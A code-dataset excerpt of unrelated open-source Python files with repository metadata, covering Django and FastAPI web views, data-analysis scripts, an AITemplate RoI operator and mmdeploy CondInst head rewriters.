avg_complexity['avg_complexity'] if avg_complexity['avg_complexity'] is not None else \"N/A\"\n\n evaluations = Evaluation.objects.filter(subject=i)\n context['evaluacion'] = evaluations\n\n context['experience_form'] = ExperienceForm(prefix='experience_form')\n context['rate_form'] = RateForm(prefix='rate_form')\n context['comment_form'] = CommentForm(prefix='comment_form')\n\n return context\n \nclass SubjectList(ListView):\n model = Subject\n template_name = 'subject/explore.html'\n context_object_name = 'materias'\n paginate_by = 9\n\n def get_queryset(self):\n query = self.request.GET.get('search_query')\n if query:\n queryset = Subject.objects.filter(name__icontains=query)\n else:\n queryset = Subject.objects.all()\n return queryset\n\n def 
get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = \"Catálogo\"\n context['subtitle'] = \"Materias\"\n context['search'] = self.request.GET.get('search_query', '')\n for i in context['materias']:\n i.count = Evaluation.objects.filter(subject=i).count()\n avg_complexity = Evaluation.objects.filter(subject=i).aggregate(avg_complexity=Avg('complexity'))\n i.avg = avg_complexity['avg_complexity'] if avg_complexity['avg_complexity'] is not None else \"N/A\"\n return context","repo_name":"hectordomin/ModularP-evidences","sub_path":"app/website/core/erp/utils/subject/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34919101142","text":"import pandas as pd\r\nimport numpy as np\r\nimport math\r\n\r\ndef find_closest_sales(n_closest, sales_df, property_lat, property_lon):\r\n# --> dataframe of n closest sales\r\n ################# Brute Force method iterating over each row ################\r\n # Time complext for this method:\r\n # 1. for each property, iterate through sales_df and calculate distance, it will take O(N)\r\n # 2. sorting and get top n_closest will take O(NlogN): it can be optimized to O(Nlog(n_closest))\r\n # 3. if properties have total of M values, the toal time complexity is O(MN + MNlogN)\r\n sales_df['distance'] = 0.0\r\n for i in range(len(sales_df)):\r\n sales_df.loc[i, 'distance']= 3963 * 2 * math.asin(math.sqrt(math.sin((math.radians(sales_df.loc[i, 'lat']) - math.radians(property_lat))/2)**2 + math.cos(math.radians(property_lat)) * math.cos(math.radians(sales_df.loc[i, 'lat'])) * math.sin((math.radians(sales_df.loc[i, 'long']) - math.radians(property_lon))/2)**2))\r\n return sales_df.sort_values(\"distance\", ascending=True).head(n_closest).drop(\"distance\", axis=1)\r\n ################ Use df.apply method##########################################\r\n # sales_df['distance'] = sales_df.apply(lambda cols: 3963 * 2 * math.asin(math.sqrt(math.sin((math.radians(cols.lat) - math.radians(property_lat))/2)**2 + math.cos(math.radians(property_lat)) * math.cos(math.radians(cols.lat)) * math.sin((math.radians(cols.long) - math.radians(property_lon))/2)**2)), axis = 1)\r\n # return sales_df.sort_values(\"distance\", ascending=True).head(n_closest).drop(\"distance\", axis=1)\r\n ################# Method with Numpy and vectorization#########################\r\n # sales_df['lat_rad'], sales_df['long_rad'] = np.radians(sales_df['lat']), np.radians(sales_df['long'])\r\n # sales_df['lat_diff'] = sales_df['lat_rad'] - math.radians(property_lat)\r\n # sales_df['long_diff'] = sales_df['long_rad'] - math.radians(property_lon)\r\n # sales_df['distance'] = 3963 * 2 * np.arcsin(np.sqrt(np.sin(sales_df['lat_diff']/2)**2 + math.cos(math.radians(property_lat)) * np.cos(sales_df['lat_rad']) * np.sin(sales_df['long_diff']/2)**2))\r\n # return sales_df.sort_values(\"distance\", ascending=True).head(n_closest).drop([\"distance\", \"lat_rad\", \"lat_diff\", \"long_diff\", \"long_rad\"], axis=1)\r\n ################ Convert np code to one line coder##################################\r\n # sales_df['distance'] = 3963 * 2 * np.arcsin(np.sqrt(np.sin((np.radians(sales_df['lat']) - math.radians(property_lat))/2)**2 + math.cos(math.radians(property_lat)) * np.cos(np.radians(sales_df['lat'])) * np.sin((np.radians(sales_df['long']) - math.radians(property_lon))/2)**2))\r\n # return sales_df.sort_values(\"distance\", 
ascending=True).head(n_closest).drop(\"distance\", axis=1)\r\n\r\nsales_df = pd.read_csv(\"sales.csv\")\r\nproperties_df = pd.read_csv(\"properties.csv\")\r\nfor index, row in properties_df.iterrows():\r\n print(find_closest_sales(5, sales_df, row['lat'], row['long']))\r\n","repo_name":"huangchong9004/citi_test","sub_path":"nearest10.py","file_name":"nearest10.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19818525170","text":"import itertools\nimport logging\nimport re\nfrom collections import OrderedDict\nfrom typing import List\n\nimport jinja2\n\nfrom aitemplate import backend\nfrom aitemplate.backend import registry\nfrom aitemplate.compiler.base import Operator, Tensor\nfrom aitemplate.utils import shape_utils\n\n# pylint: disable=C0103,W0221,R1732,W0613\nlogging.basicConfig(level=logging.INFO)\n\nSHAPE_FUNC_TEMPLATE = jinja2.Template(\n \"\"\"\n{{indent}}{{dtype}}NI = {{x_dim0}};\n{{indent}}{{dtype}}HI = {{x_dim1}};\n{{indent}}{{dtype}}WI = {{x_dim2}};\n{{indent}}{{dtype}}CI = {{x_dim3}};\n{{indent}}{{dtype}}KH = {{pooled_size}};\n{{indent}}{{dtype}}KW = {{pooled_size}};\n{{indent}}{{dtype}}NO = {{num_rois}};\n{{indent}}{{dtype}}CO = CI;\n{{indent}}{{dtype}}HO = {{pooled_size}};\n{{indent}}{{dtype}}WO = {{pooled_size}};\n\"\"\"\n)\n\nSHAPE_ASSIGNMENT_TEMPLATE = jinja2.Template(\n \"\"\"\n{{indent}}{{y_dim0}} = NO;\n{{indent}}{{y_dim1}} = HO;\n{{indent}}{{y_dim2}} = WO;\n\"\"\"\n)\n\nEXEC_COND_TEMPLATE = jinja2.Template(\n \"\"\"\n{{indent}}if ({{cond}}) {\n{{indent}} {{program}}\n{{indent}}}\n\"\"\"\n)\n\n\nclass roi_ops_base(Operator):\n \"\"\"\n Performs Region of Interest (RoI) Pool operator described in Fast R-CNN.\n\n * :attr:`num_rois` identifies the number of RoIs in the input.\n\n * :attr:`pooled_size` identifies the size of the pooling section, i.e., the size of the output (in bins or pixels) after the pooling\n is performed, as (height, width).\n\n * :attr:`sampling_ratio` is the number of sampling points in the interpolation grid\n used to compute the output value of each pooled output bin. If > 0,\n then exactly ``sampling_ratio x sampling_ratio`` sampling points per bin are used. If\n <= 0, then an adaptive number of grid points are used (computed as\n ``ceil(roi_width / output_width)``, and likewise for height).\n\n * :attr:`spatial_scale` is a scaling factor that maps the box coordinates to\n the input coordinates. For example, if your boxes are defined on the scale\n of a 224x224 image and your input is a 112x112 feature map (resulting from a 0.5x scaling of\n the original image), you'll want to set this to 0.5.\n\n * :attr:`position_sensitive`, a bool value.\n\n * :attr:`continuous_coordinate`. a bool value.\n\n Args:\n x (Tensor[N, H, W, C]): the feature map, i.e. a batch with ``N`` elements. Each element contains ``C`` feature maps of dimensions ``H x W``.\n rois (Tensor[roi_batch, 5]): the list of RoIs and each ROI contains the index of the corresponding element in the batch, i.e. a number in ``[0, N - 1]``, and the box coordinates in (x1, y1, x2, y2) format where the regions will be taken from. 
The coordinate must satisfy ``0 <= x1 < x2`` and ``0 <= y1 < y2``.\n\n Return:\n Tensor[roi_batch, pooled_size, pooled_size, C]: the fixed-size feature maps, i.e., the pooled RoIs.\n\n \"\"\"\n\n def __init__(\n self,\n num_rois,\n pooled_size,\n sampling_ratio,\n spatial_scale,\n position_sensitive,\n continuous_coordinate,\n ) -> None:\n super().__init__()\n self._attrs[\"op\"] = \"roi_align\"\n self._attrs[\"num_rois\"] = num_rois\n self._attrs[\"sampling_ratio\"] = sampling_ratio\n self._attrs[\"spatial_scale\"] = spatial_scale\n self._attrs[\"position_sensitive\"] = position_sensitive\n self._attrs[\"continuous_coordinate\"] = continuous_coordinate\n self._attrs[\"pooled_size\"] = pooled_size\n self.shape_eval_template = SHAPE_FUNC_TEMPLATE\n self.shape_save_template = SHAPE_ASSIGNMENT_TEMPLATE\n self.exec_cond_template = EXEC_COND_TEMPLATE\n\n def _infer_shape(self, x: List[int]):\n eval_func = self.shape_eval_template.render(\n indent=\"\",\n dtype=\"\",\n div=\"//\",\n x_dim0=x[0],\n x_dim1=x[1],\n x_dim2=x[2],\n x_dim3=x[3],\n num_rois=self._attrs[\"num_rois\"],\n pooled_size=self._attrs[\"pooled_size\"],\n position_sensitive=self._attrs[\"position_sensitive\"],\n )\n\n output = {}\n exec(eval_func, output) # noqa: P204 # noqa: P204\n return [\n int(output[\"NO\"]),\n int(output[\"HO\"]),\n int(output[\"WO\"]),\n int(output[\"CO\"]),\n ]\n\n def _infer_shapes(self, x: Tensor):\n x_shape_values = [var._attrs[\"values\"] for var in x._attrs[\"shape\"]]\n x_shapes = itertools.product(*x_shape_values)\n # run infershape for each\n y_shapes = []\n for x_shape in x_shapes:\n y_shape = self._infer_shape(x_shape)\n y_shapes.append(y_shape)\n\n def unique(vector):\n return sorted(set(vector))\n\n output_shape = [\n shape_utils.gen_int_var(unique([d[0] for d in y_shapes])),\n shape_utils.gen_int_var(unique([d[1] for d in y_shapes])),\n shape_utils.gen_int_var(unique([d[2] for d in y_shapes])),\n shape_utils.gen_int_var(unique([d[3] for d in y_shapes])),\n ]\n return output_shape\n\n def _invert_exec_key(self, key):\n tmp = re.findall(r\"(\\d+)\", key)\n return [int(x) for x in tmp]\n\n def _gen_exec_key(self, shape):\n return self.exec_key_template.render(\n x_dim0=shape[0], x_dim1=shape[1], x_dim2=shape[2], x_dim3=shape[3]\n ).replace(\"\\n\", \"\")\n\n def _extract_exec_path(self, x: Tensor):\n self._attrs[\"exec_path\"] = OrderedDict()\n self._attrs[\"exec_path\"][\"true\"] = \"\"\n\n def _signature(self):\n signature = \"roi_align: num_rois=[{num_rois}], \\\n sampling_ratio=[{sampling_ratio}], \\\n spatial_scale=[{spatial_scale}], \\\n position_sensitive=[{position_sensitive}], \\\n continuous_coordinate=[{continuous_coordinate}], \\\n pooled_size=[{pooled_size}]\".format(\n num_rois=self._attrs[\"num_rois\"],\n sampling_ratio=self._attrs[\"sampling_ratio\"],\n spatial_scale=self._attrs[\"spatial_scale\"],\n position_sensitive=self._attrs[\"position_sensitive\"],\n continuous_coordinate=self._attrs[\"continuous_coordinate\"],\n pooled_size=self._attrs[\"pooled_size\"],\n )\n return signature\n\n def __call__(self, x: Tensor, rois: Tensor) -> List[Tensor]:\n self._attrs[\"inputs\"] = [x, rois]\n self._set_depth()\n self._extract_exec_path(x)\n output_shape = self._infer_shapes(x)\n output = Tensor(output_shape, src_ops={self}, dtype=x._attrs[\"dtype\"])\n self._attrs[\"outputs\"] = [output]\n return output\n\n def _get_op_attributes(self):\n target_attrs = [\n \"continuous_coordinate\",\n \"num_rois\",\n \"pooled_size\",\n \"position_sensitive\",\n \"sampling_ratio\",\n 
\"spatial_scale\",\n ]\n attr = {}\n\n for target_attr in target_attrs:\n if target_attr in self._attrs:\n attr[target_attr] = self._attrs[target_attr]\n\n return attr\n\n def gen_function(self) -> str:\n target = backend.target.Target.current()\n template_path = target.template_path()\n func_key = \"{target}.{op}.gen_function\".format(\n target=target.name(), op=self._attrs[\"op\"]\n )\n func = registry.get(func_key)\n return func(\n self._attrs,\n template_path,\n self.exec_cond_template,\n self.shape_eval_template,\n self.shape_save_template,\n )\n","repo_name":"facebookincubator/AITemplate","sub_path":"python/aitemplate/compiler/ops/vision_ops/roi_ops/roi_ops.py","file_name":"roi_ops.py","file_ext":"py","file_size_in_byte":7607,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"} +{"seq_id":"41852016577","text":"from fastapi import APIRouter, Query\nfrom pymongo import ASCENDING, DESCENDING\nfrom typing import List\nfrom bson import ObjectId\n\nfrom models.courses import Course, Chapter\nfrom config import collection\n\nrouter = APIRouter()\n\n\n@router.get('/courses', response_model=List[Course])\ndef get_courses(sort_by: str = 'alphabetical', domain: List[str] = Query(None)):\n sort_dict = {\n 'alphabetical': ('name', ASCENDING),\n 'date': ('date', DESCENDING),\n 'rating': ('rating', DESCENDING)\n }\n sort_key, sort_order = sort_dict.get(sort_by, sort_dict['alphabetical'])\n\n query = {}\n if domain:\n query['domain'] = {'$in': domain}\n\n courses = list(collection.find(query).sort(sort_key, sort_order))\n return courses\n\n\n@router.get('/courses/{course_id}', response_model=Course)\ndef get_course(course_id: str):\n course = collection.find_one({'_id': ObjectId(course_id)})\n if course:\n return course\n else:\n return {'error': 'Course not found.'}\n\n\n@router.get('/courses/{course_id}/chapters/{chapter_index}', response_model=Chapter)\ndef get_chapter(course_id: str, chapter_index: int):\n course = collection.find_one({'_id': ObjectId(course_id)})\n if course and chapter_index < len(course['chapters']):\n return course['chapters'][chapter_index]\n else:\n return {'error': 'Chapter not found.'}\n\n\n@router.post('/courses/{course_id}/chapters/{chapter_index}/rate', response_model=Chapter)\ndef rate_chapter(course_id: str, chapter_index: int, rating: bool):\n course = collection.find_one({'_id': ObjectId(course_id)})\n if course and chapter_index < len(course['chapters']):\n chapters = course['chapters']\n chapters[chapter_index]['rating'] += 1 if rating else -1 \n course_rating_aggregate = sum([chapter['rating'] for chapter in chapters])\n \n collection.update_one({'_id': ObjectId(course_id)}, {'$set': {\n 'chapters': chapters,\n 'rating': course_rating_aggregate\n }})\n return course['chapters'][chapter_index]\n else:\n return {'error': 'Chapter not found.'}\n ","repo_name":"chandankuiry/kimo-assignment","sub_path":"routers/courses.py","file_name":"courses.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1849198781","text":"from django.urls import path\nfrom . 
import views\nurlpatterns = [\n path('login/', views.logar, name=\"login\"),\n path('home/', views.home, name=\"home\"),\n path('addTreinador', views.addTreinador, name=\"addTreinador\"),\n path('addItens/', views.addItens, name=\"addItens\"),\n path('delete-pokemon//', views.deletePokemon, name='deletePokemon'),\n path('visao/', views.visao, name=\"visao\"),\n path('addPoke/', views.addPoke, name=\"addPoke\"),\n path('addinfopoke/', views.addinfopoke, name=\"addinfopoke\"),\n]","repo_name":"JVictor011/Pokedex","sub_path":"usuarios/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24924287785","text":"from django.shortcuts import render\nfrom markdown2 import Markdown\nfrom django.http import HttpResponseRedirect\nfrom django import forms\nfrom django.urls import reverse\n\nimport random\n\nmarkdowner = Markdown()\n\nfrom . import util\n\n\ndef index(request):\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": util.list_entries()\n })\n\n\ndef edit(request, entrytitle):\n #Who knew that get_entry loaded the contents of the file *FACEPALM*\n loadpage = util.get_entry(entrytitle) \n if request.method == \"POST\":\n util.delete_entry(entrytitle)\n entrytitle = request.POST[\"title\"]\n entryarea = request.POST[\"entryarea\"]\n\n util.save_entry(entrytitle, entryarea)\n return HttpResponseRedirect(reverse(\"entry\", kwargs={'title': entrytitle}))\n else:\n return render(request, \"encyclopedia/edit.html\", {\n \"entrytitle\": entrytitle,\n \"entryarea\": loadpage\n })\n\ndef entry(request, title):\n entrylist = util.list_entries()\n if title in entrylist:\n entryname = util.get_entry(title)\n conventry = markdowner.convert(entryname)\n return render(request, \"encyclopedia/entry.html\", {\n #Pass the new page both so you can edit the TITLE and display BODY\n \"entry\": markdowner.convert(entryname),\n \"entrytitle\": title\n })\n else:\n return render(request, \"encyclopedia/entryfail.html\", {\n \"entrytitle\": title\n })\n\ndef search(request):\n searchitem = request.GET.get(\"q\")\n if (util.get_entry(searchitem) is not None):\n return HttpResponseRedirect(reverse(\"entry\", kwargs={'title': searchitem}))\n else:\n subString = []\n for entry in util.list_entries():\n if searchitem.upper() in entry.upper():\n subString.append(entry)\n if len(subString) == 0:\n return render(request, \"encyclopedia/entryfail.html\", {\n \"entrytitle\": searchitem\n })\n\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": subString,\n \"search\": True,\n \"searchitem\": searchitem\n })\n\n\ndef create(request):\n if request.method == \"POST\":\n entrytitle = request.POST[\"title\"]\n entryarea = request.POST[\"entryarea\"]\n #If it doesn't exist, \n if (util.get_entry(entrytitle) is None):\n util.save_entry(entrytitle, entryarea)\n return HttpResponseRedirect(reverse(\"entry\", kwargs={'title': entrytitle}))\n else:\n strstr = \"The entry \" + entrytitle + \" already exists, edit name or choose another.\"\n return render(request, \"encyclopedia/create.html\", {\n \"message\": strstr,\n \"entrytitle\": entrytitle,\n \"entryarea\": entryarea\n })\n else:\n return render(request, \"encyclopedia/create.html\",)\n\ndef rando(request):\n #Load the list entries\n #Find random number between 0 and len(list)\n #Go to the link of that pages entrytitle\n listentry = util.list_entries()\n length = len(listentry)\n rand = random.randint(0,length-1)\n 
entry = listentry[rand]\n return HttpResponseRedirect(reverse(\"entry\", kwargs={'title': entry}))\n","repo_name":"Mattmont415/WikipediaClone-Django-Python","sub_path":"encyclopedia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15089451412","text":"import pandas as pd\r\nimport numpy as np\r\nfrom statsmodels.tsa.arima.model import ARIMA\r\nimport matplotlib.pyplot as plt\r\n\r\n# Load the time series data\r\ndata = pd.read_csv('time_series_data.csv')\r\n\r\n# Convert the data into a time series object\r\nts = data['Value']\r\n\r\n# Fit the ARIMA model\r\nmodel = ARIMA(ts, order=(1,1,1))\r\nmodel_fit = model.fit()\r\n\r\n# Print summary of the model\r\nprint(model_fit.summary())\r\n\r\n# Plot the residuals\r\nresiduals = pd.DataFrame(model_fit.resid)\r\nresiduals.plot()\r\nplt.show()\r\n\r\n# Plot the residuals density\r\nresiduals.plot(kind='kde')\r\nplt.show()\r\n\r\n# Perform a normality test on the residuals\r\nfrom scipy.stats import normaltest\r\nstat, p = normaltest(residuals)\r\nprint('Statistics=%.3f, p=%.3f' % (stat, p))\r\n\r\n# Make predictions\r\nforecast = model_fit.forecast(steps=10)[0]\r\n","repo_name":"deep-palariya/Time-Series-Analysis","sub_path":"timeseriescode.py","file_name":"timeseriescode.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9947312034","text":"import numpy as np \nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom process import get_data\nfrom predict import softmax\n\ndef y2indicator(y, K):\n N = len(y)\n ind = np.zeros((N, K))\n for i in range(N):\n ind[i, y[i]] = 1\n return ind\n\n\ndef forward(X, W, b):\n return softmax(X.dot(W) + b)\n\ndef predict(P_Y_given_X):\n return np.argmax(P_Y_given_X, axis=1)\n\ndef classification_rate(Y, P):\n return np.mean(Y == P)\n\ndef cross_entropy(Y, pY):\n # N, _ = Y.shape\n # return -(np.sum(Y * np.log(pY)))/N\n return -np.mean(Y * np.log(pY))\n\ndef main():\n Xtrain, Ytrain, Xtest, Ytest = get_data()\n\n D = Xtrain.shape[1]\n K = len(set(Ytrain) | set(Ytest))\n\n # convert to indicator\n Ytrain_ind = y2indicator(Ytrain, K)\n Ytest_ind = y2indicator(Ytest, K)\n\n # randomly initialize weights\n W = np.random.randn(D, K)\n b = np.zeros(K)\n\n train_costs = []\n test_costs = []\n learning_rate = 0.001\n # run for 10,000 epochs in this example\n for i in range(10000):\n pYtrain = forward(Xtrain, W, b)\n pYtest = forward(Xtest, W, b)\n\n ctrain = cross_entropy(Ytrain_ind, pYtrain)\n ctest = cross_entropy(Ytest_ind, pYtest)\n\n train_costs.append(ctrain)\n test_costs.append(ctest)\n\n # gradient descent\n W -= learning_rate * Xtrain.T.dot(pYtrain - Ytrain_ind)\n b -= learning_rate * (pYtrain - Ytrain_ind).sum(axis=0)\n\n # if i % 1000 == 0:\n # print(i, ctrain, ctest)\n\n acc_train = classification_rate(Ytrain, predict(pYtrain))\n print('Score:', acc_train) \n\n acc_test = classification_rate(Ytest, predict(pYtest))\n print('Score - Test:', acc_test) \n\n plt.plot(train_costs, label = 'train cost')\n plt.plot(test_costs, label = 'test cost')\n plt.legend()\n plt.show()\n \nif __name__ == '__main__':\n main()","repo_name":"jacksauser/ML-and-Computer-Vision","sub_path":"logistic_softmax_train.py","file_name":"logistic_softmax_train.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"72499812969","text":"'''\n@Author: Yang\n@Date: 2019-11-06 16:09:32\n@LastEditors: Yang\n@LastEditTime: 2019-11-07 09:45:52\n@FilePath: /Python/regular.py\n@Description: \n'''\n\nimport re\n\n\ndef main():\n userName = input('请输入您的用户名:')\n\n # m1 = re.match(r'^/w{6,20}$', userName)\n\n # if not m1:\n # print('请输入有效的用户名')\n\n # qq = input('请输入您的qq账号:')\n # m2 = re.match(r'^[1-9]/d{4,11}&', qq)\n # if not m2:\n # print('请输入有效的QQ号.')\n # if m1 and m2:\n # print('你输入的信息是有效的!')\n m1 = re.match(r'(?>=abc)\\d\\s')\n if m1:\n print(m1)\n\n\nif __name__ == \"__main__\":\n main()\n\n\"\"\"\n . 用来匹配任何单个字符,换行符除外\n [] 匹配字符集合\n \\d 数字字符,等价于[0-9]\n \\D 非数字字符,等价于[^0-9]\n \\w 字母数字下划线,等价于[a-z0-9A-Z_]\n \\W 非数字字母下划线,等价于[^a-z0-9\bA-Z_]\n \\s 空白字符,换行,换页,制表符等,等价于[\\f\\r\\n\\v\\t]\n \\S 非空白字符\n \n\n\"\"\"\n","repo_name":"devYoungyang/Python-Study","sub_path":"Python/regular.py","file_name":"regular.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13920347821","text":"from typing import Dict, List, Optional\n\nimport torch\nfrom mmdet.models.utils import aligned_bilinear\nfrom mmengine.config import ConfigDict\nfrom torch import Tensor\n\nfrom mmdeploy.codebase.mmdet.deploy import get_post_processing_params\nfrom mmdeploy.core import FUNCTION_REWRITER\nfrom mmdeploy.mmcv.ops.nms import multiclass_nms\n\n\n@FUNCTION_REWRITER.register_rewriter(\n 'mmdet.models.dense_heads.CondInstBboxHead.predict_by_feat')\ndef condinst_bbox_head__predict_by_feat(\n self,\n cls_scores: List[Tensor],\n bbox_preds: List[Tensor],\n score_factors: Optional[List[Tensor]] = None,\n param_preds: Optional[List[Tensor]] = None,\n batch_img_metas: Optional[List[dict]] = None,\n cfg: Optional[ConfigDict] = None,\n rescale: bool = False,\n with_nms: bool = True,\n):\n ctx = FUNCTION_REWRITER.get_context()\n deploy_cfg = ctx.cfg\n\n assert len(cls_scores) == len(bbox_preds)\n device = bbox_preds[0].device\n cfg = self.test_cfg if cfg is None else cfg\n batch_size = bbox_preds[0].shape[0]\n featmap_sizes = [cls_score.shape[-2:] for cls_score in cls_scores]\n\n all_level_points_strides = self.prior_generator.grid_priors(\n featmap_sizes, device=device, with_stride=True)\n all_level_points = [i[:, :2] for i in all_level_points_strides]\n all_level_strides = [i[:, 2] for i in all_level_points_strides]\n\n flatten_cls_scores = [\n cls_score.permute(0, 2, 3, 1).reshape(batch_size, -1,\n self.cls_out_channels)\n for cls_score in cls_scores\n ]\n flatten_bbox_preds = [\n bbox_pred.permute(0, 2, 3, 1).reshape(batch_size, -1, 4)\n for bbox_pred in bbox_preds\n ]\n flatten_score_factors = [\n score_factor.permute(0, 2, 3, 1).reshape(batch_size, -1, 1)\n for score_factor in score_factors\n ]\n flatten_param_preds = [\n param_pred.permute(0, 2, 3, 1).reshape(batch_size, -1, self.num_params)\n for param_pred in param_preds\n ]\n flatten_cls_scores = torch.cat(flatten_cls_scores, dim=1).sigmoid()\n flatten_bbox_preds = torch.cat(flatten_bbox_preds, dim=1)\n flatten_score_factors = torch.cat(flatten_score_factors, dim=1).sigmoid()\n flatten_param_preds = torch.cat(flatten_param_preds, dim=1)\n\n points = torch.cat(all_level_points)\n strides = torch.cat(all_level_strides)\n tl_x = points[..., 0] - flatten_bbox_preds[..., 0]\n tl_y = points[..., 1] - flatten_bbox_preds[..., 1]\n br_x = points[..., 0] + flatten_bbox_preds[..., 2]\n br_y = points[..., 1] + flatten_bbox_preds[..., 3]\n\n bboxes = torch.stack([tl_x, tl_y, br_x, br_y], -1)\n scores 
= flatten_cls_scores\n score_factors = flatten_score_factors\n param_preds = flatten_param_preds\n scores = scores * score_factors\n\n # get post processing config\n post_params = get_post_processing_params(deploy_cfg)\n max_output_boxes_per_class = post_params.max_output_boxes_per_class\n iou_threshold = cfg.nms.get('iou_threshold', post_params.iou_threshold)\n score_threshold = cfg.get('score_thr', post_params.score_threshold)\n pre_top_k = post_params.pre_top_k\n keep_top_k = cfg.get('max_per_img', post_params.keep_top_k)\n\n dets, labels, inds = multiclass_nms(\n bboxes,\n scores,\n max_output_boxes_per_class,\n iou_threshold,\n score_threshold,\n pre_top_k=pre_top_k,\n keep_top_k=keep_top_k,\n output_index=True,\n )\n\n batch_inds = torch.arange(batch_size, device=bboxes.device).view(-1, 1)\n points = points.unsqueeze(0).repeat(batch_size, 1, 1)\n strides = strides.unsqueeze(0).repeat(batch_size, 1)\n param_preds = param_preds[batch_inds, inds, :]\n points = points[batch_inds, inds, :]\n strides = strides[batch_inds, inds]\n results = dict(\n dets=dets,\n labels=labels,\n param_preds=param_preds,\n points=points,\n strides=strides)\n return results\n\n\n@FUNCTION_REWRITER.register_rewriter(\n 'mmdet.models.dense_heads.CondInstMaskHead.forward')\ndef condinst_mask_head__forward(self, x: tuple,\n positive_infos: Dict[str, torch.Tensor]):\n mask_feats = self.mask_feature_head(x)\n\n param_preds = positive_infos['param_preds']\n points = positive_infos['points']\n strides = positive_infos['strides']\n\n batch_size = points.shape[0]\n num_insts = points.shape[1]\n hw = mask_feats.size()[-2:]\n mask_feats = mask_feats.unsqueeze(1).repeat(1, num_insts, 1, 1, 1)\n\n points = points.reshape(-1, 1, 2).unsqueeze(0)\n locations = self.prior_generator.single_level_grid_priors(\n hw, level_idx=0, device=mask_feats.device)\n locations = locations.unsqueeze(0).repeat(batch_size, 1,\n 1).reshape(batch_size, 1, -1, 2)\n centers = points.reshape(batch_size, -1, 1, 2)\n rel_coordinates = (centers - locations).permute(0, 1, 3, 2).float()\n rel_coordinates /= (strides[:, :, None, None] * self.size_of_interest)\n rel_coords = rel_coordinates.reshape(batch_size, -1, 2, hw[0], hw[1])\n mask_head_inputs = torch.cat([rel_coords, mask_feats], dim=2)\n\n weights, biases = _parse_dynamic_params(self, param_preds)\n mask_preds = _dynamic_conv_forward(mask_head_inputs, weights, biases)\n mask_preds = mask_preds.reshape(batch_size, num_insts, hw[0], hw[1])\n mask_preds = aligned_bilinear(\n mask_preds, int(self.mask_feat_stride / self.mask_out_stride))\n return (mask_preds, )\n\n\n@FUNCTION_REWRITER.register_rewriter(\n 'mmdet.models.dense_heads.CondInstMaskHead.predict_by_feat')\ndef condinst_mask_head__predict_by_feat(self,\n mask_preds: Tensor,\n results_list: Dict[str, torch.Tensor],\n batch_img_metas: List[dict],\n rescale: bool = True,\n **kwargs):\n cfg = self.test_cfg\n\n dets = results_list['dets']\n labels = results_list['labels']\n img_hw = batch_img_metas[0]['img_shape'][:2]\n\n mask_preds = mask_preds.sigmoid()\n mask_preds = aligned_bilinear(mask_preds, self.mask_out_stride)\n mask_preds = mask_preds[:, :, :img_hw[0], :img_hw[1]]\n masks = (mask_preds > cfg.mask_thr).float()\n\n return dets, labels, masks\n\n\ndef _parse_dynamic_params(self, params: Tensor):\n \"\"\"parse the dynamic params for dynamic conv.\"\"\"\n batch_size = params.shape[0]\n num_insts = params.shape[1]\n params = params.permute(1, 0, 2)\n params_splits = list(\n torch.split_with_sizes(\n params, self.weight_nums + self.bias_nums, 
dim=2))\n\n weight_splits = params_splits[:self.num_layers]\n bias_splits = params_splits[self.num_layers:]\n\n for idx in range(self.num_layers):\n if idx < self.num_layers - 1:\n weight_splits[idx] = weight_splits[idx].reshape(\n batch_size, num_insts, self.in_channels, -1)\n else:\n weight_splits[idx] = weight_splits[idx].reshape(\n batch_size, num_insts, 1, -1)\n\n return weight_splits, bias_splits\n\n\ndef _dynamic_conv_forward(features: Tensor, weights: List[Tensor],\n biases: List[Tensor]):\n \"\"\"dynamic forward, each layer follow a relu.\"\"\"\n n_layers = len(weights)\n x = features.flatten(0, 1).flatten(2)\n for i, (w, b) in enumerate(zip(weights, biases)):\n # replace dynamic conv with bmm\n w = w.flatten(0, 1)\n b = b.flatten(0, 1).unsqueeze(2)\n x = torch.bmm(w, x)\n x = x + b\n if i < n_layers - 1:\n x = x.clamp_(min=0)\n return x\n","repo_name":"open-mmlab/mmdeploy","sub_path":"mmdeploy/codebase/mmdet/models/dense_heads/condinst_head.py","file_name":"condinst_head.py","file_ext":"py","file_size_in_byte":7640,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"20292721062","text":"\"\"\" Module for I/O\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport json\nimport os\nfrom builtins import super\n\nimport numpy as np\nfrom astropy.table import Table\nfrom scipy.interpolate import CubicSpline\n\nfrom . import __path__\n\nDATA_PATH = os.path.join(__path__[0], 'data')\n\n\ndef numpify_dict(d):\n \"\"\"\n Recursively make lists in a dictionary into numpy array\n \"\"\"\n def numpify(d):\n for k, v in d.items():\n if isinstance(v, list):\n d[k] = np.array(v)\n elif isinstance(v, dict):\n numpify(v)\n new_dict = d.copy()\n numpify(new_dict)\n return new_dict\n\n\nclass Params(dict):\n \"\"\"\n Input parameters\n \"\"\"\n\n def __init__(self, ifile='ne2001_params.json', path=None, **new_params):\n \"\"\"\n 